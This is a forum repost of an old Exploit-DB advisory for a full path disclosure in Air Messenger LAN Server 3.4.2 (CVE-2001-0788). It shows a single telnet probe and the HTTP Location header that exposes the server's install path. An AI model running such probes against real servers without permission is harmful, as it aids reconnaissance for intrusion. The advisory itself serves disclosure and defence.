Exploit Internet Software Solutions Air Messenger LAN Server 3.4.2 - Full Path Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20934
Проверка EDB
  1. Пройдено
Автор
SNS RESEARCH
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2001-0788
Дата публикации
2001-06-18
Код:
source: https://www.securityfocus.com/bid/2881/info

Air Messenger LAN Server for Microsoft Windows allows users to exchange phone, pager and email messages through a Web gateway.

The path to sensitive files used by AMLServer can be easily obtained by any remote user, simply by examining the webserver's http-header 'Location' field.

$ telnet target 80|grep Location

Location: http://C:\PROGRA~1\ISS\AIRMES~1\Messages
Connection closed by foreign host.
 
Источник
www.exploit-db.com

Похожие темы